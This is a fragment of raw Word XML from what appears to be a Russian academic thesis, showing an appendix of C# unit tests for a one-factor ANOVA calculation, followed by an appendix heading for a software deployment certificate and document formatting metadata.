      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>&lt;/summary&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CF9A9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Fact]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686B012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public</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void</w:t>
      </w:r>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Dospehov223</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>page(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C171A24"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
    <w:p w14:paraId="4D52B809"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54, 470, 430, 500 });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796B0CE7"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b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502, 550, 490, 507 });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADAFFB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lastRenderedPageBreak/>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c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601, 670, 550, 607 });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E91DF62"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d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07, 412, 475, 402 });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3397C2"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xml:space="preserve"> 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FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>double</w:t>
      </w:r>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>[] { 418, 470, 460, 412 });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F51A931"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proofErr w:type="gram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w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">] data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OneFactorData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>[] { a, b, c, d, e };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD4B41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p>
    <w:p w14:paraId="2D0D906D"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ova</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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ova</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>new</w:t>
      </w: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nova</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>(data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6A76A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489.35, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>anova.avgX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, 1e-3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B576C7E"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20, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>anova.n</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E9E6A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86960.8, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>anova.SSa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, 1e-3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4370EF"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7979.75, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>anova.SSe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, 1e-3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195064D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04940.550, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>anova.SS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, 1e-3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C39EBD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4, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>anova.dfA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, 1e-3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15197F7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5, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>anova.df</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, 1e-3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3C6C80"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21740.2, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>anova.MSa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, 1e-3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1B23AC"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198.65, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>anova.MSe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, 1e-3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3447AB"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18.137, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>anova.F</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, 1e-3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AE17DA"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3.06, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>anova.Fcrit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, 1e-3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D5F0E5"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val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Assert.Equal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">(0, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>anova.p</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, 1e-3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32874DD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val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC22A58"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 xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DF2166" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00295BB1" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796B7319" w14:textId="68132091" w:rsidR="00CC2EBA" w:rsidRDefault="00CC2EBA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="128AF8FE" w14:textId="1777EB15" w:rsidR="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="_Toc162709252"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ПРИЛОЖЕНИЕ Е (Справка о внедрении программного продукта на предприятии</w:t>
      </w:r>
      <w:r w:rsidRPr="00B549DB">
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w14:paraId="40D53F28" w14:textId="033C075E" w:rsidR="0093378B" w:rsidRPr="00A91EEC" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30F34617" wp14:editId="3A06A398">
            <wp:extent cx="5762846" cy="809694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5276" cy="8100354"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0093378B" w:rsidRPr="00A91EEC" w:rsidSect="00A365F8">
      <w:footerReference w:type="default" r:id="rId73"/>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1"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7105A15" w15:done="1"/>
  <w15:commentEx w15:paraId="44ADABDB"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7105A15" w16cid:durableId="29A21BD6"/>
  <w16cid:commentId w16cid:paraId="44ADABDB" w16cid:durableId="29A21D1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65316" w14:textId="77777777" w:rsidR="00591A13" w:rsidRDefault="00591A13" w:rsidP="00505306">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="438E6A34" w14:textId="77777777" w:rsidR="00591A13" w:rsidRDefault="00591A13"/>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4708261F" w14:textId="77777777" w:rsidR="00591A13" w:rsidRDefault="00591A13" w:rsidP="00505306">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAB5D23" w14:textId="77777777" w:rsidR="00591A13" w:rsidRDefault="00591A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B255DF" w14:textId="77777777" w:rsidR="00591A13" w:rsidRDefault="00591A13" w:rsidP="00505306">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="019516A5" w14:textId="77777777" w:rsidR="00591A13" w:rsidRDefault="00591A13"/>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3EB13F3C" w14:textId="77777777" w:rsidR="00591A13" w:rsidRDefault="00591A13" w:rsidP="00505306">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D3BB29" w14:textId="77777777" w:rsidR="00591A13" w:rsidRDefault="00591A1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18C6BE3C"/>
    <w:lvl w:ilvl="0" w:tplc="FB78E8D0">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2242"/>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C7560"/>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1606"/>
    <w:rsid w:val="001E5444"/>
    <w:rsid w:val="001F04F3"/>
    <w:rsid w:val="001F2617"/>
    <w:rsid w:val="001F2AD4"/>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2D28"/>
    <w:rsid w:val="0024650C"/>
    <w:rsid w:val="00246A9D"/>
    <w:rsid w:val="0025430B"/>
    <w:rsid w:val="002575FA"/>
    <w:rsid w:val="002606B4"/>
    <w:rsid w:val="002620AC"/>
    <w:rsid w:val="002644B2"/>
    <w:rsid w:val="00264D60"/>
    <w:rsid w:val="0026511D"/>
    <w:rsid w:val="00267DD0"/>
    <w:rsid w:val="00267F12"/>
    <w:rsid w:val="002747E5"/>
    <w:rsid w:val="00274AAD"/>
    <w:rsid w:val="00277ABE"/>
    <w:rsid w:val="00281AB2"/>
    <w:rsid w:val="00282062"/>
    <w:rsid w:val="00284702"/>
    <w:rsid w:val="0029195D"/>
    <w:rsid w:val="00295BB1"/>
    <w:rsid w:val="0029731F"/>
    <w:rsid w:val="002A0DC9"/>
    <w:rsid w:val="002B0300"/>
    <w:rsid w:val="002B109D"/>
    <w:rsid w:val="002B2CF3"/>
    <w:rsid w:val="002C09BA"/>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A41B1"/>
    <w:rsid w:val="003B0BDC"/>
    <w:rsid w:val="003B28BD"/>
    <w:rsid w:val="003B38D3"/>
    <w:rsid w:val="003C0A79"/>
    <w:rsid w:val="003C43F0"/>
    <w:rsid w:val="003D282A"/>
    <w:rsid w:val="003D2BA6"/>
    <w:rsid w:val="003E3F21"/>
    <w:rsid w:val="003E5C5F"/>
    <w:rsid w:val="003F0EAF"/>
    <w:rsid w:val="003F1515"/>
    <w:rsid w:val="003F5A28"/>
    <w:rsid w:val="003F71C9"/>
    <w:rsid w:val="0040023D"/>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1170"/>
    <w:rsid w:val="004A2370"/>
    <w:rsid w:val="004A2DC3"/>
    <w:rsid w:val="004A3F2E"/>
    <w:rsid w:val="004A45F4"/>
    <w:rsid w:val="004A4E6E"/>
    <w:rsid w:val="004B3C0C"/>
    <w:rsid w:val="004B6D8A"/>
    <w:rsid w:val="004B746E"/>
    <w:rsid w:val="004C1501"/>
    <w:rsid w:val="004D038C"/>
    <w:rsid w:val="004D118E"/>
    <w:rsid w:val="004D17E2"/>
    <w:rsid w:val="004D222C"/>
    <w:rsid w:val="004D37C5"/>
    <w:rsid w:val="004D3E4B"/>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27702"/>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1A13"/>
    <w:rsid w:val="005924E5"/>
    <w:rsid w:val="00596370"/>
    <w:rsid w:val="00597351"/>
    <w:rsid w:val="00597917"/>
    <w:rsid w:val="005A31AD"/>
    <w:rsid w:val="005A39EB"/>
    <w:rsid w:val="005A5E0B"/>
    <w:rsid w:val="005A683C"/>
    <w:rsid w:val="005B14B0"/>
    <w:rsid w:val="005B249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4F9F"/>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A3814"/>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8F0"/>
    <w:rsid w:val="00877909"/>
    <w:rsid w:val="008807B6"/>
    <w:rsid w:val="008809B0"/>
    <w:rsid w:val="008853DD"/>
    <w:rsid w:val="008870EE"/>
    <w:rsid w:val="00892905"/>
    <w:rsid w:val="00894CEA"/>
    <w:rsid w:val="008A25D3"/>
    <w:rsid w:val="008A26DF"/>
    <w:rsid w:val="008B1D74"/>
    <w:rsid w:val="008B52A5"/>
    <w:rsid w:val="008C1A5F"/>
    <w:rsid w:val="008C24C6"/>
    <w:rsid w:val="008D61B3"/>
    <w:rsid w:val="008D656C"/>
    <w:rsid w:val="008E24A9"/>
    <w:rsid w:val="008E2E18"/>
    <w:rsid w:val="008E4276"/>
    <w:rsid w:val="008E6783"/>
    <w:rsid w:val="008F05DC"/>
    <w:rsid w:val="008F14CF"/>
    <w:rsid w:val="008F392E"/>
    <w:rsid w:val="008F53E6"/>
    <w:rsid w:val="008F702B"/>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607C"/>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15631"/>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6BB1"/>
    <w:rsid w:val="00A67502"/>
    <w:rsid w:val="00A76471"/>
    <w:rsid w:val="00A82002"/>
    <w:rsid w:val="00A833AB"/>
    <w:rsid w:val="00A84917"/>
    <w:rsid w:val="00A86ECB"/>
    <w:rsid w:val="00A91EEC"/>
    <w:rsid w:val="00A968B2"/>
    <w:rsid w:val="00A96FE7"/>
